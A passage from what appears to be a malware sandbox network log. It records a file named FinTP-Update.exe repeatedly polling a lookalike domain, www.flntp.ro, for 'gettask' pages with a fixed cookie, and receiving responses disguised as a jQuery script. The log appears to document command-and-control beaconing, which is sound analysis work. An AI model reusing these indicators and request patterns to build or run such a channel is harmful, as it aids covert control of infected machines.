                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:48 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:48 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:48 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.5497863.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:50 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:50 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:50 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:50 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.5497923.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:52 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:53 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:53 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:53 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.5497983.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:54 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:55 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:55 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:55 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.5498043.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:57 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:57 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:57 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5692
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:57 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.5498103.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:59 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:59 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:59 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:59 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.5498163.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:01 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:02 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:02 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5607
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:02 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.5498223.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:04 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:04 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:04 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:04 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.5498293.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:06 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:07 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:06 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:07 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.5498353.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:08 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:13:09 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:13:09 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5649
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:13:09 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.5498433.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:13:10 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
